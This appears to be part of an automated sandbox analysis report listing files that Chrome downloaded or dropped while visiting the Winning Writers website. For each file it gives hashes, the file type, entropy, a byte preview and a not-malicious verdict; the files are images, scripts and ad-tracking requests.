                                                                                                                                                                                            URL:https://winningwriters.com//assets/images/insta_heart.png
                                                                                                                                                                                            Preview:.PNG........IHDR.......*.....?......IDATx.....%W}...E...d......".....3.h.{..!,.......0x..%......EX..`r.I...6.a..H....G.. .......!.&tx.......F..n.z.~.&&$I.$I.$I.$I..Ak.u.t..o..4w.....4..)uU<1{vW..g....6....O..O....../u!.S...s........+.8[.........:}...7.??..?U.<...].|}h^...U..........g..G......{....nv......K.$I.S..u<....>.....e.~.>~q?...._......._../..o.{......U.;.b/.C.....-.s.}O...._..*.!........r.....Q.~..W...r..O.{.r.U...$I.4&m.:.z[g6..g..M.|.........]....'w..~.u./..fvT\......7.............Sn...<..M..~....6.$I.~..b.n./.}...9...Wy_......6..?,.Cjw....>d...|_......|......[..+.se.yN5{[.>I.$I............M.r3...um.?.o.N..[.....w.\Xn......k..|......m......7.f....t.J.$i.[......!e...p.V..y?..|.....]..aEl.../....?X..._.S........r..$I..%...x..oy...'........~.......!}....79.*....^...8.%I...}i..U.1.W..}.Gw=.c.=.Pj..#...r_.......x.y3....^.$I.r..X.t..|h.......(.......?mH...J.m....]...xTy..B..;k$I....!...l.....G/~.s.w..F..........].S..|L..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):28
                                                                                                                                                                                            Entropy (8bit):4.208966082694623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:gdyiCR:gdK
                                                                                                                                                                                            MD5:984989D076F24AFCA6D64C4B4013A21E
                                                                                                                                                                                            SHA1:1981CA77195CF97742526BA625E83D7BEA3047A5
                                                                                                                                                                                            SHA-256:74121C568843C638582321BCF9C1CAB9D9C091F94110A90EA90BA9AFB1C9A392
                                                                                                                                                                                            SHA-512:B5DB7D85F4577212074C1E2ACA7CEBAF392BF650CBC43D2E97930E24605E5BA8C943A07FC85ED92B4A56369F92A0930068E7E23F417737D9AF04564647FA6E31
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlnlVNGSIVs3BIFDQT1TzESBQ3MhcbG?alt=proto
                                                                                                                                                                                            Preview:ChIKBw0E9U8xGgAKBw3MhcbGGgA=
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):80838
                                                                                                                                                                                            Entropy (8bit):5.356181148316
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:RJeUwT76HXhpwPCHM9ZVK01QqSYTZ02LKVsdmpyKcicgR:RIT7OXVs9ZVKBvYj8wKcHgR
                                                                                                                                                                                            MD5:0DBF49EBCA66DAE9D42B158D4113DEAC
                                                                                                                                                                                            SHA1:7261E96704C938CCF6491A18E02631B009A5FF03
                                                                                                                                                                                            SHA-256:15A68B948A9022C4F0C3E7FD9F38CB6D692F0F8E31AA9264CE06FF521B282D15
                                                                                                                                                                                            SHA-512:F5790D980BC7948ED0CC499342C2848E2662BCD79F91A1E44CB100BED0B011157BCDD86DC15132D9ED0F631447DAF5196FB8CC78D6D2B0D10B50553A68A8A84C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1080, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):228898
                                                                                                                                                                                            Entropy (8bit):7.957635301251326
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:Xpjh5ifpRwp+2SLS0leV+ejRHDKl3vsO36:XpjhaRgKTsVdyfsQ6
                                                                                                                                                                                            MD5:232AA14D5295D4280783237AF1EEA651
                                                                                                                                                                                            SHA1:880B467382822C2ACE32DA179024D8197D5567FB
                                                                                                                                                                                            SHA-256:CBED19EF4D8C17F56EB4B156E6CFC0087AAE90F8CEBBF7743DDF9DD3970CAFC8
                                                                                                                                                                                            SHA-512:692E2A728FFEFCD94A0DB42449E8FC9B66F0E234F6C7590A9E35E387F7B329141E3BB5423DE5465D3BA4C2A4D16B241FB7945707CE1D2D1451E86A28E8BC29FF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......JFIF.............C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..A.cFy."(%.....5....N...A.;.......o....V............c0.%..R..}.E..7..)..............*?.......:w..G.5..Ey?...E....>..I...?...........C.......Q...........*?..(.../.....4.................*?.......:w..G.5..E....E......&....w..........:w..G.4..S....gN.......>h..z.................~...S....gN........Jt?.............oO......?.......O.o.Jt?............N...A.;.......
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 970 x 250, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):99807
                                                                                                                                                                                            Entropy (8bit):7.992553042072697
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:/LYD3+t0KGWrLUocPn/3fhswK88Nke4oYytPnV8BSgNVYaqQrRdMxh3weHd7DUgM:j0eGWPxM3fhsu8SeHhVwSqIQQP9Ub
                                                                                                                                                                                            MD5:7FDBA925BC84EDB05452E9B8B1CFA382
                                                                                                                                                                                            SHA1:ACED710DAE45D156C2D26CE2D42F0F131E6A175A
                                                                                                                                                                                            SHA-256:447ECF69E0D3DAEDD79371AAA579F04BE23803493B98E321B33EEFA5D5D54BF0
                                                                                                                                                                                            SHA-512:B498CB4C6083187A0EE0CCEAFD1BBD8E62C2D35904DA66860D674EDF732EDA3D5DF3A717C7CE17D1ACB3FEF20263206D61518CDB7058531D4C8FE9B2A83A2A60
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.............y.......pHYs..........+.....fiTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-10-27</Attrib:Created>. <Attrib:ExtId>1</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Best Free WW Top Banner 2024 - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.adobe.com/pdf/1.3/'>. <pdf:Author>Adam Cohen</pdf:Author>. </rdf:Description>.. <rd
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1406
                                                                                                                                                                                            Entropy (8bit):3.5638569207444366
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:G9AjOxlYuttpe8ZXGqK3c+EvbGWhTfSc45Zoi6cNd8MF/9wZUO:E8OxlFy8ZwmTGWhY5ZoizNdvF/9K
                                                                                                                                                                                            MD5:FE4290984BB2D9DD650F095133E9550C
                                                                                                                                                                                            SHA1:293C2B0E8DD8628AAAB85D581AE260BD55833232
                                                                                                                                                                                            SHA-256:6780C449F752209540ADD333117DD0E8D64E11FEE963FD56BAE96A0AF1D0285C
                                                                                                                                                                                            SHA-512:28CC8E7560321B9A5FD2D2E63BFAC073B6BA8BDC11D1BF358B8796573A687DE8CBD325B9453A58A3B624CC744E59CD9A906651DBDE9F9EDF61F4F8523F12F683
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:..............h.......(....... ...........@...........................;c.......1..l........K..........Sv......,U...?.._.......Hm......{...............%N...7......4_.......A..Bg..Zx..f...Mr..1Y..........&U.. L..............Qp......b.......g....E..=e..\{.......A...C.......G.......;.......3...9..'Q...X..Ss.......4......No..^~..c....A..l....E.......?..]}.......A...?...B...M..=d..@h......Ci.......3..#N...:...B...3...B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960046417&cv=11&fst=1731960046417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13682
                                                                                                                                                                                            Entropy (8bit):4.369460928312164
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:3Q2hoqqat8+qrOLyBiFqopyUCByPzCbrdYDtsBinyaupWyZcl6tW5u1q8MqhX0D/:3QdwijoyxpJcwA5u7vqB
                                                                                                                                                                                            MD5:460FA23C832EF1DE3BCA01208467045E
                                                                                                                                                                                            SHA1:1DC79614723E046EAE7E8FF08E29D814AB6DDE93
                                                                                                                                                                                            SHA-256:21301AED232D9311346E0A3B14534CEDFB136743BB6D4BD86A294F35DFCAC69F
                                                                                                                                                                                            SHA-512:568BD1E19D1C7884FF701FF9D1BCFCF59935C11F724743D95FB4B6346BED219915AAD5660B35A2DF7BFC5FD8EBCC91FEE1D9E7CCF9D90F2BFFAC02CBDBC4EA48
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*! responsive-nav.js 1.0.23. * https://github.com/viljamis/responsive-nav.js. * http://responsive-nav.com. *. * Copyright (c) 2013 @viljamis. * Available under the MIT license. */..(function () {.. "use strict";.. /* exported responsiveNav */. var responsiveNav = function (el, options) {. . var computed = !!window.getComputedStyle;. . // getComputedStyle polyfill. if (!computed) {. window.getComputedStyle = function(el) {. this.el = el;. this.getPropertyValue = function(prop) {. var re = /(\-([a-z]){1})/g;. if (prop === "float") {. prop = "styleFloat";. }. if (re.test(prop)) {. prop = prop.replace(re, function () {. return arguments[2].toUpperCase();. });. }. return el.currentStyle[prop] ? el.currentStyle[prop] : null;. };. return this;. };. }. /* exported addEvent, removeEvent, getChildren, setAttributes, addClass, removeClass
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 150 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4242
                                                                                                                                                                                            Entropy (8bit):7.831133258501859
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:8l2IJMI6CgDA0TY57Sn+03/zXpBZOEX1B:8NMI67TmGnpbLD
                                                                                                                                                                                            MD5:F4D39774861332CDAA6921C63F809F81
                                                                                                                                                                                            SHA1:9ACADAA84BBCA9A6BD4C11D0A43591D65B95045C
                                                                                                                                                                                            SHA-256:D83B077051F3FF4FA907BCD63D657667E28E677E6ABB008F17633C66EC7D85E1
                                                                                                                                                                                            SHA-512:587FCF4B90FDD2ABC5F2B7EBC26846089B365B687E20A52F5534758426EB045985AEDB2C3AF566D2AD70463C6E693CE4129A7DCC46DFB488FD7C679072BC1D1A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/social-sprite-2020.png
                                                                                                                                                                                            Preview:.PNG........IHDR.............".e:....tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmpMM:InstanceID="xmp.iid:1657FAF9B44611EAA981E67EF18D8615" xmpMM:DocumentID="xmp.did:1657FAFAB44611EAA981E67EF18D8615"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1657FAF7B44611EAA981E67EF18D8615" stRef:documentID="xmp.did:1657FAF8B44611EAA981E67EF18D8615"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>L..e....IDATx..[{pT..?..G..D#./..R...1."......-0N...q...mG.?..T...?.QyVASE.%..&.H....%A!....!.._....pssw.w...o..n.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4880), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4880
                                                                                                                                                                                            Entropy (8bit):5.814669700406099
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU4e7AmtU7m1:1DY0h8Rx47OIqWbZhe7AmT
                                                                                                                                                                                            MD5:A43B1FD8F0E85706E05CA4E9FAAFC4BC
                                                                                                                                                                                            SHA1:9E8FAE22E6B1BE98A2BCDE902BC33CF3FB0DFA11
                                                                                                                                                                                            SHA-256:5008FFB0EE2530333D30FC4B83850D4304B521C3D37C5C7AFFBFE77446FAB027
                                                                                                                                                                                            SHA-512:F31360887CB4430E633539BED917D1020AB31134A7FA7724F9834B745A1A106B7B267CF2F1FA144F573E828097A65069DD1D92BBC22999D15D43168F69B2865D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 50 x 28, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1596
                                                                                                                                                                                            Entropy (8bit):6.935275342468915
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:N1htZdWwylZ82lYSqMHiWeA45VwtT3ohyJ3VDteAfGCwaUcezMCLKJhxg:zqinNuiWe7+JJ3fem8JbLK9g
                                                                                                                                                                                            MD5:17010EABC38256152257B0A0193502E0
                                                                                                                                                                                            SHA1:0DDDD539EABE638F992C571F0E3CC272675EAEBA
                                                                                                                                                                                            SHA-256:BF1DE56AC494972F4C85D02EC14D1081C255795D34191D83747A9D23AD5D30B9
                                                                                                                                                                                            SHA-512:630B3165D8862C3A0ACECEF817229741F3B30794156A470502ED11B6131A15E67270CA1D037E311D66BD4E0322D8EBB026CEA46581F5C9EC3D8EBF6F7D991E48
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/search.png
                                                                                                                                                                                            Preview:.PNG........IHDR...2...........{.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:C508247BAB39DE11919BBBE5BE681828" xmpMM:DocumentID="xmp.did:E934D970319111E39611DEC0FE3DCF01" xmpMM:InstanceID="xmp.iid:E934D96F319111E39611DEC0FE3DCF01" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6B3F16C624206811822AF15E66BD7D4D" stRef:documentID="uuid:C508247BAB39DE11919BBBE5BE681828"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:gzip compressed data, truncated
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):27
                                                                                                                                                                                            Entropy (8bit):3.169382490786664
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Ftt4ipq4Wln:XtrxWl
                                                                                                                                                                                            MD5:8C843FFB840DECAC646424269B22D78B
                                                                                                                                                                                            SHA1:823D50FAA2E9D2D75CAEC02C2595C953F165F956
                                                                                                                                                                                            SHA-256:CF5E566DC08016A63E1667A2726699C3ADE378330F8E073CC4632D0D19B9F51E
                                                                                                                                                                                            SHA-512:C0C1F5624728CDBC57F55C77F6D59C53584F74731A25B8C2EC7C8CCE72725C7AB7A1E1266A8940F19E6C018D3E4A6FA36602987E7EC3680CFFE501A44289070C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:...........................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):129166
                                                                                                                                                                                            Entropy (8bit):7.947847746379115
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:kiqwrMqxg477wXVnJpnLJ+EAfve/vTowyuYvWZxx82zVqXHZaH9xLbr8Sry:FqlqxgDnvnTLvswyuHZFzV8obrHe
                                                                                                                                                                                            MD5:9A16A410E7886B0C632D76918FB2D3ED
                                                                                                                                                                                            SHA1:7E917285DCC54165CFC31AB578EB77AA178C279C
                                                                                                                                                                                            SHA-256:FC297C59E45A5B0D003CF84FB1F47451BB8D7B2CA11A119F1575DDBDBD0F9F21
                                                                                                                                                                                            SHA-512:ABCCEBC8CF6F3BD5601E3E0C9B787EAB0EEA6ECB8A56E2C7196EC66C2EC43C569F558DEBB44E9F64B06C7FBDEF3931464CBA1A07E33543F4325278670AB25AB3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:E9B5A97A828611EF9F3CBEB41D1C8283" xmpMM:InstanceID="xmp.iid:E9B5A979828611EF9F3CBEB41D1C8283" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:53a0dae3-ce74-4b37-9fe2-55279ca55f85" stRef:documentID="adobe:docid:photoshop:d9ba6530-e9de-a44d-8d7f-b373b71e6c16"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 970 x 250, 8-bit colormap, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):111088
                                                                                                                                                                                            Entropy (8bit):7.988756209843177
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:f52uM1uXUeMfGK7qPKRCKHuLJPur33Zzlu/P:fMuMIw+PTa2JkZzlQP
                                                                                                                                                                                            MD5:3EAD745493A5CB6CD6D68596CED4161D
                                                                                                                                                                                            SHA1:6DD6EB3A4DF80B470066D6BD0E2470BD3BB01111
                                                                                                                                                                                            SHA-256:6421F937E92DA66A68B43B650CA55A3C1720E321F41A44D2F4E202013EBBFAAF
                                                                                                                                                                                            SHA-512:1D3FA6B6C2484E68C601F8114AE4C802ACF836FF195F06DABCAC08F56A31B16E47FB8ABC9C9646BB279EBF9F320D49937DDFA6FD1CBADE56A7FAA7ACA743C2A5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.............N#N6....pHYs..........+......PLTE................U...&%...]..4.......,..C..M..;.....H......#"...........c.....'...%#............ .}" ............x..............i........o..t....(.................yZH........................IAI...........B..........#M...S............o]...v.....fP.......=79..e...>-).....-=e..........2...}i....{...........5.iRF...3# ....7..5WLLO........]p....$-JY..o|.xbUV.....l[k..Q:/......xl..eku.....2B?.........z_..n"'2....v..i.....z.....].....j.....N~.........`FECZs..\I-.......h..9Kwyvv.X?UWXf..uVUd..-,...QdlGQi'*i7:.w.....Z]kQS.u..wL6........6I\........]....wP....q.k.......mRpZY..Uix..........sr......W....|......e?..}.......xt..p.nf.|......@.....w. k;4...__.p..p.;........+0.z..DC.=.XN...{.....cX......ze..d.'..Y....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960022416&cv=11&fst=1731960022416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16621
                                                                                                                                                                                            Entropy (8bit):5.122325674580119
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:0THUMZq3ZquGb0A+T9eJkQgDGRTJ+1fdQ9fB9DNm:kq3ZqHIGRMhdsho
                                                                                                                                                                                            MD5:7D87CE904AB76326BFF3147C72A45B2A
                                                                                                                                                                                            SHA1:B5A7A40ADA6F87047F00E95915356AFF82CB0959
                                                                                                                                                                                            SHA-256:58564BC237B683F482C3A82DEF059F27B2BE41109D237D7A2380074B5B4F22BE
                                                                                                                                                                                            SHA-512:FC2F4D093D3C8ECBFD30F25C59F30E92BF7457664ECF8871247B1802671B05B674C047BFCD0C2C9A674B49CE0BAB9CDAED2416F69797381C775019EC250CBC0D
                                                                                                                                                                                            Malicious:false
